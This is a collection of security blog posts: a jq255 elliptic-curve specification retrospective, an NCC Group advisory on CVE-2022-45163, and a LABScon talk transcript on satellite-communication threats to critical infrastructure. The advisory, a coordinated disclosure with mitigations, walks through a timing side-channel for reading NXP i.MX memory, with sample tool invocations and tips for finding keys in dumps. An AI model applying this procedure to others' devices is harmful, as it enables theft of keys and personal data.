Companies need to remain vigilant, follow upstream sources closely, and do their best to provide complete patches to users as soon as possible.

A jq255 Elliptic Curve Specification, and a Retrospective

21 November 2022 at 16:38

First things first: there is now a specification for the jq255e and jq255s elliptic curves; it is published on the C2SP initiative and is formally in (draft) version 0.0.1: https://github.com/C2SP/C2SP/blob/main/jq255.md

The jq255e and jq255s groups are prime-order groups appropriate for building cryptographic protocols, and based on elliptic curves. These curves are from the large class of double-odd curves and their specific representation and formulas are described in particular in a paper I wrote this summer: https://eprint.iacr.org/2022/1052. In a nutshell, their advantages, compared to other curves of similar security levels, are the following:

  • They have prime order; there is no cofactor to deal with, unlike plain twisted Edwards curves such as Curve25519. They offer the same convenience for protocol building as other prime order groups such as ristretto255.
  • Performance is good; cost of operations on curve points is similar to that of twisted Edwards curves, or even somewhat faster. This is true on both large systems (servers, laptops, smartphones) and small and constrained hardware (microcontrollers). On top of that, jq255e (specifically) gets a performance boost for some operations (multiplication of a point by a full-width scalar) thanks to its internal endomorphism.
  • Signatures are short; digital signatures have size only 48 bytes instead of the usual 64 bytes of Ed25519 signatures, or ECDSA over P-256 or secp256k1. This is not a new method, but only the application of a technique that has been known since the late 1980s, but was overlooked for some unclear reasons. The reduction in size also makes verification faster, which is a nice side effect.
  • Implementation is simple; the formulas are straightforward and complete, and the point decompression only requires a square root computation in a finite field, without needing the combined square-root-and-inversion used in ristretto255.

The point of having a specification (as opposed to a research paper) is to provide a practical and unambiguous reference that carefully delineates potential pitfalls, and properly defines the exact encoding rules so that interoperability is achieved. Famously, Curve25519 was not specified in that way, and implementations tried to copy each other, though with some subtle differences that still plague the whole ecosystem. By writing a specification that defines and enforces canonical encodings everywhere, along with a reference implementation (in Python), I am trying to avoid that kind of suboptimal outcome. In jq255 curves, any public key, private key or signature value has a single valid representation as a fixed-size sequence of bytes, and all decoding operations duly reject any input that does not follow such a representation.

The specification is currently a “draft” (i.e. its version starts with “0”). It is meant to gather comments. As per the concept of C2SP, the specification is published as a GitHub repository, so that comments and modifications can be proposed by anybody, using the tools of software development (issues, pull requests, versioning…). It is my hope that these curves gain some traction and help avoid some problems that I still encounter regularly in practical uses of elliptic curve cryptography (in particular related to the non-trivial cofactor of twisted Edwards curves).


This specification is the occasion, for me, to look back at the research I made in the area of elliptic curve cryptography over the past few years. The output of that research can be summarized by the list of corresponding papers, all of which having been pushed to the Cryptology ePrint Archive:

The following trends can be detected:

  • All these papers are about elliptic curves as “generic groups” for which the discrete logarithm problem is believed hard. I did not pursue research (or, more accurately, I found nothing worth publishing) in the area of pairing-friendly elliptic curves, which are special curves with extra properties that enable very nifty functionalities (notably BLS signatures).
  • I always try to achieve a practical benefit in applications, such as making things run faster, or use shorter encodings, with some emphasis on small software embedded systems (i.e. microcontrollers using a small 32-bit CPU such as the ARM Cortex M0+). Small embedded systems tend to be a lot more constrained in resources, and sensitive to optimizations in size and speed, than large servers where CPU power is plentiful and the cost of cryptography in an application is mostly negligible. All papers include links to corresponding open-source implementations that illustrate the application of the described techniques.
  • Whenever possible, I try to explore interoperable solutions; the inertia of already deployed systems is a tremendous force that cannot be dismissed offhandedly, and it is worth investigating ways to apply possible optimizations in the implementation of existing protocols such as EdDSA or ECDSA signatures, even if better solutions could be designed (such as jq255 curves and their signatures).

The first paper in the list above defines a prime-order elliptic curve called Curve9767. The main idea is to use a field extension. Elliptic curves are defined over a (finite) field, where all computations are performed. Usually, we work over the field of integers modulo a given big prime, and we choose the prime such that computations in that field are efficient (for instance, Curve25519 uses the prime 2255-19). In all generality, finite fields have order pm for some prime p (the “field characteristic”) and integer m ≥ 1 (the “extension degree”); for a given total field size (at least 2250 or so, if we want to claim “128-bit security”), the two ends of the spectrum are m = 1 (the field has order p, this is the case of Curve25519 or P-256) and p = 2 (the field has order 2m, as is used in some standard NIST curves such as K-233; more on that later on). Situations “in between”, with a small-ish p but still quite greater than 2, are not well explored, and have some potential security issues that must be carefully avoided (e.g. degree m should not admit a too small prime divisor). Curve9767 uses a field which is, precisely, such an intermediate case, with p = 9767 and m = 19. This field happens to be a sweet optimization spot on, specifically, the ARM Cortex M0+ CPU, yielding good performance, in particular for computing divisions in the field. However, implementations on other architectures (including a slightly larger ARM Cortex M4 microcontroller) yielded only disappointing performance. The experience gathered in that research was not lost; I could reuse it for ecGFp5, whose field uses p = 264-232+1 and m = 5; this is a specialized curve meant for virtual machines with zero-knowledge proofs (e.g. the Miden VM).

Double-odd elliptic curves are a category of curves that had been somewhat neglected previously. Most “classic” research on elliptic curves focused on curves with a prime order, since a prime-order group is what is needed to build cryptographic functionalities such as key exchange (with Diffie-Hellman). When a curve order is equal to rh, for some prime r and an integer h > 1 (h is then called the “cofactor”), protocols built on the curve must take some extra care to avoid issues with the cofactor. Not all protocols were careful enough in practice. Montgomery curves, later reinterpreted as twisted Edwards curves, have a non-trivial cofactor (h is always a multiple of 4 for such curves). Sometimes, the cofactor’s deleterious effects can be absorbed at relatively low cost at the protocol level, but this always requires some extra analysis. Twisted Edwards curves, in particular, offer very good performance with simple and complete formulas (no special case to handle, and this is a very good thing, especially for avoiding side-channel attacks on implementations), but their simplicity is obtained at the cost of pushing some complexity into the protocol. Twisted Edwards curves with cofactor h = 4 or 8 can be turned into convenient prime-order groups, thereby voiding the cofactor issues, through the Decaf/Ristretto construction; this is how the ristretto255 group is defined, over the twisted Edwards Curve25519. With double-odd curves, I explored an “intermediate” case of curves with cofactor h = 2, over which a prime-order group can be built with similar techniques. I recently reinterpreted such curves as a sub-case of an equation type known as the Jacobi quartic, and that finally yielded a prime-order group with all the security and convenience that can be achieved with ristretto255, albeit with somewhat simpler formulas (especially for decoding and encoding points) and slightly better performance. That result was worth describing as a practical specification so that it may be deployed in applications, hence the jq255 document and reference implementation with which I started this present blog post.

Another way to handle cofactor issues is through a validation step, to detect and reject points which are not in the proper prime-order subgroup. This can be done at the cost of a multiplication by the subgroup order (denoted r above), which is simple enough to implement, but expensive. In the case of curves with cofactor 4 or 8, a faster technique is possible, which halves that cost. This paper was meant mostly in the context of FROST signatures, where such validation is made mandatory (for the Ed25519 cipher suite). Even so, this is still expensive, and real prime-order groups such as ristretto255 (or, of course, the jq255 curves) are preferable.

Some of my elliptic curve research was yet one level higher, i.e. in the protocols, and specifically in the handling of signatures. The core principle of signatures on prime order groups was described by Schnorr in the late 1980s; for unfortunate patent-related reasons, a rather clunky derived construction known as DSA was standardized by NIST, and adapted to elliptic curves under the name ECDSA. In 2012, EdDSA signatures were defined, using the original Schnorr scheme, applied to twisted Edwards curves; when the curve is Curve25519 (a reinterpretation, with a change of variables, of a Montgomery curve defined in 2006), the result is called Ed25519. The verification of an ECDSA or EdDSA signature is relatively expensive; an optimization technique for this step, by Antipa et al, was known since 2005, but it relied on a preparatory step which was complicated to implement and whose cost tended to cancel the gains from the optimization technique. That preparatory step could be described as a case of lattice basis reduction in dimension two, with an algorithm from Lagrange, dating back to the 18th century (the roots of cryptographic science are deep). In 2020, I described a much faster, binary version of Lagrange’s algorithm, allowing non-negligible gains in the performance of signature verification, even for fast curves such as Curve25519.

ECDSA signatures, on a standard curve with 128-bit security (e.g. NIST’s P-256, or the secp256k1 curve used in many blockchain systems), have size 64 bytes (in practice, many ECDSA signatures use an inefficient ASN.1-based encoding which makes them needlessly larger than that). Ed25519 signatures also have size 64 bytes. The signature size can be a problem, especially for protocols dealing with small embedded systems, with strict constraints on communication bandwidth. A few bits can be removed from a signature by having the verifier “guess” their value (through exhaustive search), though this increases the verification cost; this can be done for any signature scheme, but in the case of ECDSA and EdDSA, leveraging the mathematical structure of the signatures allows somewhat larger gains, to the extent that it can be practical to reduce EdDSA signatures down to 60 bytes or so. This is a very slight gain, but in some situations it can be a lifesaver. Importantly, this technique, just like the speed optimization described previously, works on plain standard signatures and does not require modifying the signature generator in any way; these are examples of “interoperable solutions”.

Last but not least, I could apply some of the ideas of double-odd curves to the case of binary curves. These are curves defined over finite fields of cardinal 2m for some integer m. To put it in simple words, these fields are weird. Addition in these fields is XOR, so that addition and subtraction are the same thing. In such a field, 1 + 1 = 0 (because 2 = 0). Squaring and square roots are linear operations; every value is a square and has a single square root. Nothing works as it does in other fields; elliptic curves must use their own specific equation format and formulas. Nevertheless, standard curves were, quite early, defined on binary fields, mostly because they are amenable to very fast hardware implementations. Among the fifteen standard NIST curves, ten are binary curves (the B-* and K-* curves, whereas the five P-* curves use integers modulo a big prime p). In more modern times, binary curves are mostly neglected, for a variety of non-completely scientific reasons, one of them being that multiplications in binary fields are quite expensive on small microcontrollers; however, such curves may be very fast on recent CPUs, and are certainly unbroken so far. Using techniques inspired by my previous work on double-odd curves (and many hours of frantic covering of hundreds of sheets of paper with scrawled calculations), I could find formulas for computing over such curves with two advantages over the previously known best formulas: they are complete (no special case for the neutral point, or for adding a point to itself), and they are faster (generic point addition in 8 field multiplications instead of 11). Applying these formulas to the standard curve K-233, I could get computations of point multiplications by a scalar under 30k cycles on a recent x86 CPU, more than twice faster than even the endomorphism-powered jq255e.

A synthetic conclusion of all this is that the question of what is the “best” curve for cryptography is certainly not resolved yet. I could produce a number of optimizations in various places, and my best attempt at general-purpose, fast-everywhere curves are jq255e and jq255s, which is why I am now specifying them so that they may be applied in practical deployments in an orderly way. But some improvements are most probably still lurking somewhere within the equations, and I encourage researchers to have another look at that space.

Technical Advisory – NXP i.MX SDP_READ_DISABLE Fuse Bypass (CVE-2022-45163)

17 November 2022 at 16:00
Vendor: NXP Semiconductors
Vendor URL: https://www.nxp.com
Affected Devices: i.MX RT 101x, i.MX RT102x, i.MX RT1050/6x, i.MX 6 Family, i.MX 7 Family, i.MX8M Quad/Mini, Vybrid
Author: Jon Szymaniak <jon.szymaniak(at)nccgroup.com>
CVE: CVE-2022-45163
Advisory URL: https://community.nxp.com/t5/Known-Limitations-and-Guidelines/SDP-Read-Bypass-CVE-2022-45163/ta-p/1553565
Risk: 5.3 (CVSS:3.0/AV:P/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N), 2.6 if C:L, 0.0 if C:N

Summary

NXP System-on-a-Chip (SoC) fuse configurations with the SDP READ_REGISTER operation disabled (SDP_READ_DISABLE=1) but other serial download functionality still enabled (SDP_DISABLE=0) can be abused to read memory contents in warm and cold boot attack scenarios. In lieu of an enabled SDP READ_REGISTER operation, an attacker can use a series of timed SDP WRITE_DCD commands to execute DCD CHECK_DATA operations, for which USB control transfer response times can be observed to deduce the 1 or 0 state of each successively tested bit within the targeted memory range.

Location

The affected code is located within the immutable read-only memory (ROM) used to bootstrap NXP i.MX Application Processors; it is not customer-updatable.

Impact

Any confidential assets stored in the DDR memory or non-volatile memory mapped registers (e.g. general purpose fuses) associated with the affected chipset could be more easily retrieved by an attacker with physical access to a target device.

The level of effort required to extract memory contents from affected systems without HABv4 enabled (i.e. an “open” device) may be greatly reduced, depending on the accessibility of the SDP interface. Instead of performing memory extraction through execution of malicious firmware, built-in ROM functionality can be abused.

When HABv4 is enabled (i.e. a “closed” device) NCC Group observed a limiting factor — only one DCD could be executed per boot.  The attack is still theoretically possible but requires significantly more overhead between each bit-read attempt to reset or power cycle the target; the data extraction rate becomes limited by how quickly the USB SDP interface can enumerate.

Details

NXP i.MX system-on-a-chip (SoC) devices provide a variety of security features and eFuse-based configuration options that customers can choose to enable, according to their threat model and security requirements. In systems leveraging HABv4 in a “closed” or “secure boot” configuration, software images booted via the UART or USB OTG-based Serial Download Protocol (SDP) must still pass cryptographic signature verification.

For this reason (and based upon NCC Group’s observations during security assessments), some NXP customers may opt to leave the Serial Download Protocol (SDP) boot mode enabled in order to initially bootstrap platforms during manufacturing and/or to execute diagnostic tests. (Although highly discouraged, many do not actually enable HAB due to project schedule limitations or other factors.) Such customers may use the SDP_READ_DISABLE fuse to prevent the SDP READ_REGISTER operation from being abused by a malicious party seeking to extract sensitive information from device memory in either a warm or cold boot attack.

The types of assets regarded as sensitive and requiring strong confidentiality guarantees is expected to vary based upon a variety of factors, including the product markets of NXP’s customers and security expectations of end-users. Examples include, but are not necessarily limited to:

  • Application or protocol-layer authentication tokens
  • Cryptographic key material (not stored in dedicated hardware-backed key storage)
  • DRM or product license information
  • Personally identifiable information (PII) and end-user data including:
    • Location
    • Device usage history
    • Stored or cached multimedia captures
  • Financial or payment card data
  • Trade secrets or other sensitive intellectual property

The boot images supported by NXP i.MX processors may contain “Device Configuration Data” (DCD) sequences, consisting of a limited set of operations (see i.MX6ULLRM Rev 1, 8.7.2 Device Configuration Data). Common use-cases of DCD functionality include clock initialization, configuration of I/O interfaces needed to retrieve a boot loader, and DDR memory controller configuration. For example, DCD functionality can alleviate the need to use multiple boot stages to overcome internal SRAM size limitations; a larger U-Boot “proper” image can be booted directly from NAND instead of requiring a U-Boot SPL to first be executed from internal SRAM to configure DDR for use by the successive U-Boot stage. Oftentimes, an NXP customer can re-use the DCD settings provided in open source reference designs with few, if any, changes.

When a device boot fails, or is otherwise specifically forced, into its Serial Download Protocol (SDP) boot mode, the SDP WRITE_DCD command can be used to send a DCD to a target device to execute.  Below is a sequence diagram illustrating the series of HID reports involved in performing the SDP WRITE_DCD operation. Observe that Report3 is sent by the target device upon completion of DCD execution. Note that the value tresp represents the turnaround time from the host sending its final Report2 and the time at which it receives the Report3 response from the target device.  texec is the amount of time that the target is actually executing the DCD.  The latter is not directly observable, but the former can be treated an estimate of the DCD execution time, with some added overhead.

The DCD CHECK_DATA command can be used to instruct the boot ROM to read a 32-bit value at a specified address and evaluate an expression with it. The expression is defined by “mask” and “set” parameters shown in the following table.

An optional 32-bit count parameter allows this command to be used to repeatedly poll a register until one or more bits are in the desired state. An example use case might be polling “PLL locked” status bits before proceeding to further configure peripheral subsystems.

If the expression is true then the boot ROM moves onto the next operation in the DCD. Otherwise, it will perform upwards of count iterations of the test. If the iteration limit is reached, the boot ROM will move onto the next command. This operation is effectively a no-op (NOP) when a count value of zero is specified. Without a count value, the boot ROM will poll indefinitely. For further clarity, this behavior is described in the following code excerpt.

To summarize:

  • The count parameter is attacker controlled, included in an SDP request
  • texec can be approximated by timing a Report3 response frame
  • The time value can be used to deduce if a bit tested via CHECK_DATA was a 1 or 0.

The behavior describe above allows CHECK_DATA to be abused as an arbitrary memory read primitive, albeit a slow one.  This is the case regardless of the SDP_READ_DISABLE=1 fuse setting which disallows use of the SDP READ_DATA command, and therefore represents a violation of the intended security policy.  Because data stored in DDR memory decays relatively slowly (as opposed to SRAM) when its controller is no longer performing refresh cycles, an attacker may be able to recover desired data on already powered off devices (see Halderman et al.).

Leveraging CHECK_DATA as a DDR memory read primitive, NCC Group collected timing samples for a sweep of different count parameter values on an i.MX6ULL development kit. The bimodal nature of data, shown below, indicates the feasibility of the attack for well-chosen count values.  The following section summarizes a proof of concept, remarks on results, and discusses the practicality of leveraging this in an attack.

Proof of Concept

In order to evaluate the practicality of an attack, NCC Group developed an internal tool called “imemx” to perform memory readout on SDP-enabled NXP i.MX devices, supporting both the standard READ_REGISTER operation and the aforementioned timing side-channel. Given the nature of the vulnerability and the challenges of patching it, we will not be releasing this tool publicly.

Instead, the remainder of this section outlines the high-level process we followed to confirm the vulnerability and evaluate the effectiveness of its exploitation.  Note that the degree of difficulty (or lack thereof) associated with each step largely depends upon factors resulting from design, board layout, and manufacturing decisions made by the NXP customer.

Step 1: Induce Loading of Target Data into Memory

Depending upon the target system, certain (target-specific) actions may need to be performed before assets of interest are decrypted, received, or otherwise loaded into RAM.  A few examples for different types of products are presented below.

  • Powering the device on and waiting short period of time for runtime initialization procedures to complete.
  • Performing basic user interaction with the device
  • Waiting for the device to receive a configuration update via its LTE interface.
  • Pairing the device with a companion mobile application via Bluetooth.
  • Producing sensor stimuli that results in MQTT events being sent to a backend system.

To simplify verification, we wrote a known random pattern to the first few kilobytes of the target address from within the U-Boot boot loader using commands such as mw and loadb.

Step 2: Force Device into SDP Mode

Next, the target device must be forced into its SDP mode of operation.  If the device has not been configured with “Boot from Fuses” setting, this can be achieved by asserting BOOT_MODE[1:0]=0b10 on associated I/O pins during a warm or power-on reset. Otherwise, it is necessary to temporarily induce non-volatile storage access failures during to cause the target device to fail into the SDP boot mode (similar to failing open into a U-Boot console in example 1 or example 2).

For convenience, Figure 8-1 from the i.MX6ULL Reference Manual (i.MX6ULLRM ) is reproduced below.  Observe that the SDP boot mode is reachable via multiple highlighted flows, including the “boot from fuses” setting.

Step 3: Initialize DDR Controller via DCD

In order to perform a warm or cold boot attack on a device, one must first perform any initialization required to interface with the DDR memory. Typically, this is implemented via DCD or in a U-Boot SPL.  For the purposes of this proof-of-concept, we assume the requisite configuration parameters have already been extracted from another device’s non-volatile storage or over-the-air update file.  Also note that it may still be possible to leverage information from open source implementations or third-party reference designs that a product was derived from to produce usable DDR configurations in the well-documented DCD format.

Once a DCD containing sufficient initialization has been prepared (a priori), it can be written to the device using NXP’s Universal Update Utility (UUU):

$ uuu SDP: dcd -f ./target_config.imx
uuu (Universal Update Utility) for nxp imx chips -- libuuu_1.4.107-15-gd1c466c

Success 0    Failure 0                                                                                                                
                                                                                                                                                                                                                                                                            
3:41     1/ 1 [============100%============] SDP: dcd -f ./target_config.imx
Okay

Care must be taken to not send a DDR configuration to the device more than once; doing so was observed to lock up the target. On HAB-enabed devices, only one DCD can be sent per boot. This implies that this step and the following step must be combined, with the DCD containing both the actual target configuration and the CHECK_DATA read primitive. As a result, a larger count value was required (due to the added DCD execution overhead) and only 1 bit per boot could be achieved on HAB-enabled devices. (Our experiment tooling automatically power-cycled the target after each bit-read.)

Step 4: Execute CHECK_DATA-based Memory Readout Attack

Finally, the CHECK_DATA timing side-channel can be exploited. The following invocation reads a 4KiB region of memory, bit-by-bit, starting at address 0x82000000.  The window threshold parameters establish which timing values to consider a 0 or a 1.  Our tool performs retries of any ambiguous results, up to a configurable maximum retry limit.

$ ./imemx -t -t-win-low 75000 -t-win-high 90000 -t-count 0x800 \ 
               -o data.bin -a 0x82000000 -s 4k 

98.88% complete   51.26 B/s    ETA: 00:00:00.90    
---------------------------------------
Completed in 1m19.901131805s
# Retries: 91

The following screenshot shows imemx running while Wireshark monitors the associated USB HID traffic.

Step 5: Analysis

The resulting data can then be analyzed to locate items of interest. For test purposes, vbindiff was used to compare the input test data with the data back from the device.  Some bit-errors are expected due to the slow degradation of DDR contents – the degree of error is expected to increase with the amount of time since the device was powered off.  An excessive number of errors may suggest that more appropriate time thresholds for bit value determination should have been chosen. 

In reality, the (non) triviality of this depends upon the target. API keys and session tokens in HTTP traffic may be conspicuous by virtue of their printable representation. Sensitive data in well-known file formats (e.g. private key in SSLeay format) may be retrieved by simply running binwalk on the memory dump. Other scenarios, however, may require a more complex constraint-driven approach that leverage a priori knowledge (or inferences) about data structure layouts in order to make productive use of tools such as Volatility.  Rather than attempting to extract all of DDR memory, a more efficient approach may be to read only as much memory required to identify per-task kernel data structures, and then leverage these to further deduce the location of active memory mappings.

Conclusions

The limited data rate and expectation of random bit-errors limit the effectiveness of this attack to scenarios in which an attacker would have prolonged access to a device they own, have found, or have stolen.  Ultimately, the value (and lifetime) of potential assets would dictate whether or not a time investment of hours, days, or even weeks constitute a worthwhile effort.  In some situations, this may simply represent an attack that can be run “in the background” while developing and testing a custom OCCAM-resident firmware image to achieve the same result.

Recommendations

NCC Group recommends that affected NXP customers revisit the threat models of their own customers and products and take the following steps, if it is determined that:

  • Prolonged physical access to (lost, stolen) devices is plausible
       AND
  • Sensitive assets or confidential data may reside in DDR RAM

Mitigations

  • Disable SDP in production devices by setting the SDP_DISABLE eFuse bit to 1.
    • If available, also set UART Serial Download Disable eFuse bit to 1.
  • As a matter of security best practice, and especially for NXP devices without CAAM support (e.g. i.MX6ULL), seek to limit the lifetime of sensitive assets (e.g. key material) in memory, immediately overwriting memory locations with zeros or randomized patterns when these assets are no longer immediately needed by software.
  • If self-test or diagnostic functionality is required, implement this via an authenticated diagnostic unlock mechanism (pgs 20-23) in the first non-ROM bootloader stage.
  • If significantly privileged access is required to support failure analysis, with analyzed devices not being returned to the field, consider using HAB authenticated bootloader functionality and using the FIELD_RETURN fuse mechanism to perform a permanent return to an “insecure” diagnostic state.
  • If not doing so already, leverage the CAAM on supported chipsets for cryptographic operations, such that secrets such as key material is neither accessible to software executing on the device, nor ever stored in DDR memory.
  • Although still vulnerable, enabling HAB appears to introduce an additional (data throughput) barrier to practical exploitation.  If doing so is feasible, the use of authenticated boot functionality is encouraged.

While obscuring access to the SDP interface signals through PCB routing strategies or application of tamper-resistant potting or encapsulation compounds is not regarded by NCC Group as a solution, these approaches can impede efforts to exploit the vulnerability documented here.  When performing cost-benefit analyses for remediation efforts, an accurate threat model should first be created and reviewed in order to assess the plausibility of threats and the effectiveness of applied mitigations.

Vendor Communication

2022-08-18 – Draft advisory submitted to NXP PSIRT for coordinated disclosure.
2022-08-18 – NXP PSIRT acknowledges receipt of advisory.
2022-08-23 – NXP PSIRT indicates analysis of report and proof-of-concept are ongoing.
2022-08-31 – NXP confirms NCC Group’s finding of a novel attack and concurs with disabling SDP as being a viable mitigation. NXP PSIRT indicates other affected devices and mitigations are currently being evaluated.
2022-09-13 – NXP provides status update indicating additional time is required to complete product portfolio analysis and communicate with affected customers. 
2022-09-14 – NCC Group extends disclosure deadline by 30 days to accommodate the above.
2022-09-30 – NXP PSIRT provides status update.
2022-10-14 – NXP PSIRT provides status update and requests additional time to communicate with affected customers.
2022-10-14 – NCC Group extends disclosure deadline to Nov. 17th, 2022.
2022-11-11 - NXP PSIRT provides status update and indicates CVE-2022-45163 has been reserved.
2022-11-14 - NCC Group acknowledges receipt of information.
2022-11-15 - NCC Group sends update regarding upcoming publication.
2022-11-17 - NCC Group publishes advisory.

Acknowledgements

Thank you to Jeremy Boone, Jennifer Fernick, and Rob Wood for their always-appreciated, invaluable guidance and support. Additional gratitude is extended to NXP PSIRT for their responsiveness throughout the disclosure process.

About NCC Group

NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate & respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity. NCC Group Hardware and Embedded Systems Services leverages decades of real-world engineering experience to provide pragmatic guidance on architecture and design, component selection, and manufacturing.

LABScon Replay | Demystifying Threats to Satellite Communications in Critical Infrastructure

By: LABScon
17 November 2022 at 14:23

Satellite communications are an integral part of many industrial control systems across many sectors, but their usage specifically in critical infrastructure continues to be misunderstood by the industry.

While there has been multiple investigations into vulnerabilities and exploitation methods of satellite systems, less attention has been given to threat vectors and how they actually impact the environments that rely on them.

Much buzz was generated by the Viasat outages in February 2022 and their effect on European wind turbines, but not on how much the service disruption actually impacted these systems. In addition, much of the guidance on how to secure satellite communication systems focuses heavily on military applications, which can have different architectures and needs than those deployed in critical infrastructure networks.

In her presentation, Demystifying Threats to Satellite Communications in Critical Infrastructure, MJ Emanuel discusses an intrusion on Inmarsat satellite providers within the US by an APT, which she’s now attributed to Russian military intelligence, APT28.

Drawing on lessons learned from recent incident responses involving satellite companies and systems, this talk covers how different sectors rely on satellite communications, trust relationships of the satellite provider ecosystem that could be potentially abused by threat actors, how various attack methods could impact infrastructure processes, and potential ways to detect abuse.
 

Demystifying threats to satellite communications in critical infrastructure | MJ Emanuel: Audio automatically transcribed by Sonix

Demystifying threats to satellite communications in critical infrastructure | MJ Emanuel: this mp4 audio file was automatically transcribed by Sonix with the best speech-to-text algorithms. This transcript may contain errors.

MJ Emanuel:
Good afternoon everyone, I was about to say morning. I'm here to talk about satellite communication usage in critical infrastructure.

I think this is something that we don't really fully understand. And so we just kind of like, say, that's scary, that's bad.

You know, there's a lot of, there is a lot of news and headlines about the wind turbine disruption after the ViaSat compromise.

But, you know, the wind turbines didn't actually stop producing energy. So I think we need to talk a little bit more about the nuance of when are data flows just interrupted and when is it visibility that's interrupted? And that's what I'm gonna try to do in this talk.

So my name is MJ Emanuel. I am on the ICS incident response team at CISA in the threat hunting subdivision, and I did kind of a mix of forensics and threat intelligence. I also will be teaching at the The Alperovitch Institute next semester about critical infrastructure and cyber.

So as I said, my you know, my goals for this talk are kind of to structure it around an incident response we had earlier this year at CISA for a SATCOM service provider. But I'm really going to be talking more about how data is generated in critical infrastructure and how it flows, because I think we need to understand like what's normal to talk about what how can we derive impacts from that? And then consequent driven impact analysis is really, really the key to this.

So this is something that's really been pushed by INL for the past couple of years. If you've heard of CCE, that's cyber. What is it, cyber-enabled, consequence-driven engineering? So it's something that's being talked about when we were talking about how do we design these systems. But I think it's something that we also need to bring about when we're analyzing these systems and thinking about threat intelligence for critical infrastructure.

So our incident kicked off just from an outside tip that there was suspicious activity in a telecommunications environment. So we initially attempted to perform victim notification to this telecom provider, and then we quickly realized that the impacted entity wasn't the telecommunications provider, it wasn't the owner of the IP, but it was who they are releasing it to and who they are releasing to was a satellite communications provider.

I think this was like a perfect "oh, no, what did we just get into?" example that kind of highlighted what happened later in this case, because I don't think anyone, any of us really can appreciate how convoluted the satellite services industry is.

There's been an insane amount of consolidation and an insane amount of mergers that make it really opaque, and it makes it really hard to drive change because there are so many players on the back end that are never, ever interacting with the end users that are subscribing to the services.

So just an example, we're going to be talking mostly about Inmarsat BGANs for this talk because that was the type of service that was impacted in the incident.

I'm going to talk about. So this is just one of the many different types of satellite services that people can use. And just for this specifically, basically, the satellites are owned by Inmarsat. There are basically only four of them. And the current generation, runs on the L band. And basically, like any of the data that's flowing, it is going to go to one of those satellites and then come back down to only six ground stations around the world.

So something that's always going to happen when you're talking about using satellite services is how does that data flow from one of those six access stations back to the end users?

Because I think a lot of us kind of think about satellites like radios. We think the data is just going to go up and then down, but that's absolutely not how it happens. And then that when that data is in transmission, there's a lot of opportunities for there to be risk. And then there's also just only three terminal manufacturers. So I'm not really going to talk about this, but when we talk about like, supply chain issues because there are so many vendors in this space, there's just also a lot of opportunity there for there to be risk.

So after we initially started talking to the actual entity that was impacted by this incident, we quickly learned that they did have customers in critical infrastructure.

MJ Emanuel:
So CISA has both the ICS cert and US Cert and Legacy Incident Response teams. That means that we're responsible for both critical infrastructure or really any private sector companies that want to come to us as well as federal agencies. And I think that kind of gives us a little bit of a bias because when a federal agency comes to us with an incident, it's very easy to realize that something we want to resource. But when a random service provider comes to us or we come to them, it's not something that's always going to be a priority.

One of the really big, I will say, lively debates about this incident was a lot of people thought that the service that was being provided was just going to be satellite phones, that it was just the phones and just talk communication that was being transmitted by these networks. Those absolutely not the case.

So I'm going to talk a little bit about like what is SCADA so we can kind of think about what exactly was being like, what was actually flowing through those environments. So I think we kind of interchanged a lot of terminology like like it's all the same, but actually, ICS and SCADA are not interchangeable.

So ICS Industrial Control Systems is kind of the larger like a bucket of term. And then SCADA: supervisory control and data acquisition really refers to a specific type. It refers to data or refers to systems that are over a large geographic area. The opposite of that would be a DCS system, a distributed control system. And that's really more like one specific location. So look at DCS is something you might see at like a specific power generation facility, something that like it's local, probably all wired. And then a SCADA system might be like power transmission, like lines over like millions of miles or not millions but miles of of data.

So and then this communication, it really is up to whoever engineered the system. You know, I've seen people lay fiber. I've seen people use migrate cellular satellite. It's really up to whoever designed the system. And then let's talk a little bit about what kind of data is being generated.

So if you look on the right side, these are kind of like the field devices that are going to be like the lowest level when we talk about like these are these are dumb systems, These are just like your temperature sensors, your pressure systems, like maybe a valve that opens or close.

And then the control of that system is going to be from the PLC, the programmable logic controller. So the data is either being the data is either a command being generated from the operators that are sitting up upstream and the corporate at the control center and it's being pushed down to the field device or the data is some sort of temperature sensor or some sort of data that's being read and sent back upstream for the operator to have.

MJ Emanuel:
So that's the type of data that we're having, both things like maintenance data as well as commands, the commands that change the physical state of those devices on the on the right.

So I kind of want to drive home that point about that translation between logic and physical change. And I think a really interesting way to do that is the configuration files from Industroyer2. So right here is one of the configuration files or part of a configuration file from Industroyer one of Industroyer2 samples and I think Industroyer 2 isn't that exciting technically because all it's really doing is pushing commands in a specific protocol, the IEC 104 protocol, which is something mostly used outside of the US and the power sector.

But basically what you can do if you try hard enough is you get these these numbers, these IOAs: information object addresses. And then if you go back to the vendor documentation, in this case it was AB, you can start to map the IOAs back to the actual engineering functions that they're referring to. So these, these numbers, so these numbers that were in the configuration file, you can map here to the data points that describe the engineering function. And then later in the documentation, you can start to translate those back to like what actually is it changing?

And so in this case, it was both supervision alarms as well as circuit breaker failure, circuit failure, data failure, protection.

Those were the things that were being turned off and on from the configuration file of industroyer2. So I think it's really hard to get to this level of understanding because every state environment is going to be engineered differently. It's not like an HTTP status code that's going to be standardized. And I think this is kind of like the crux of why the field of ICS forensics has so much trouble is we kind of keep approaching it like it's going to be something standard like a lot of IT protocols, but it's really going to be it's it's not really about like what what function codes are being generated. It's about what systems they control at the end. And that's really hard to do.

The other thing that I wanted to talk about really quickly, I guess I kind of already said was just like, I think this is how we think of a lot of data flows happening, like from the specific control center back up and then down to the field, but that it really looks like this. So you almost have at least one kind of third party that's going to be like consolidating this information from the different end users and then sending it to the ground station and then to the satellite and back down. So in the incident that I'm talking about, like this was what was compromised, it was one of those things that's consolidating.

I think they had definitely dozens. It might be over 100 customers and a lot of different important sectors. And all of the data was being was being transmitted through this one entity.

So I think, you know, I love to talk about what are what are the pain points when we talk about critical infrastructure, like what are the things that would have the most impact and these types of service providers as well as things like integrators, like the people that are building these systems for their end users, are really, really sexy targets. And I think we should maybe focus a little bit more on them as we as we think about like where could things be the most painful?

